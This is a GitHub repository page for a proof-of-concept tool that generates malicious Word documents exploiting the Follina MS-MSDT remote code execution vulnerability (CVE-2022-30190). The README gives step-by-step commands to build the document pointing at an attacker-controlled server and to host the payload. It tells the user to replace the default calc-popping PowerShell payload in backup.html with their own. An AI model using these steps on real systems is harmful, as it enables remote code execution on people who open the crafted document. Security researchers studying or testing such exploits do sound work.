Skip to content
/ CVE-2022-30190 Public

MS-MSDT Follina CVE-2022-30190 PoC document generator

8 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

sudoaza/CVE-2022-30190

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
data/word_dat
data/word_dat
 
 
img
img
 
 
out
out
 
 
srv
srv
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

MS-MSDT Follina CVE-2022-30190 PoC

Malicious docx generator to exploit (Microsoft Office Word Remote Code Execution)

Creation of this Script is based on CVE-2021-40444 PoC by LockedByte and writeup by Tothi

Using

First modify backup.html and replace powershell payload. Right now just pops a calc.exe using IEX('calc.exe').

python3 exploit.py generate http://<SRV IP>

Document generation

Once you generate the malicious docx (will be at out/) you can setup the server:

sudo python3 exploit.py host 80

Server

Finally try the docx in a Windows Virtual Machine:

Pop Calc

About

MS-MSDT Follina CVE-2022-30190 PoC document generator

Resources

Readme
Activity

Stars

8 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

 
 
 

Languages